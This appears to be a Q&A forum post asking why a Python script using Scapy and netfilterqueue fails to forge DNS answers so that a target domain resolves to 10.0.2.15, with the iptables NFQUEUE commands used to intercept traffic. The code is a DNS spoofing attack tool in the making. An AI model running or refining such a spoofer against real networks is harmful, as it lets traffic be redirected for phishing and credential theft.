# Error while trying to change 'rdata' in DNS Packet using Scapy module in Python

Tags: python, dns, scapy, spoofing

[Here is the error](https://i.stack.imgur.com/TxKaP.png)

**This is my code**

```
#!/usr/bin/env python

import netfilterqueue
import scapy.all as scapy

def process_packet(packet):
        scapy_packet = scapy.IP(packet.get_payload())
        #if scapy_packet.haslayer[scapy.DNSRR]:
        qname= scapy_packet[scapy.DNSQR].qname
        if "www.sitename.com" in qname:
                print("[+] Spoofing target")
                answer=scapy.DNSRR(rrname=qname, rdata="10.0.2.15")
                scapy_packet[scapy.DNS].an = answer
                scapy_packet[scapy.DNS].ancount = 1

                del scapy_packet[scapy.IP].len
                del scapy_packet[scapy.IP].chksum
                del scapy_packet[scapy.UDP].len
                del scapy_packet[scapy.UDP].chksum

                packet.set_payload(str(scapy_packet))
        packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
```

I use **iptables -I INPUT -j NFQUEUE --queue-num 0** and
**iptables -I OUTPUT -j NFQUEUE --queue-num 0** to trap the DNS Packet in a queue.
The issue is that I am not successfully able to change the IP Address of the site(rdata) of the packet. Can anyone tell me how can I change the rdata in the packet successfully.
For example:
    from xxx.xxx.xxx.xx to yy.y.y.y

Comment: As a general rule of thumb, it is better to avoid images of code.

Comment: @KurtKline Why?

Comment: Because people are less likely to want to invest the time to open an image in order to assist someone.

Comment: @KurtKline oh, got it.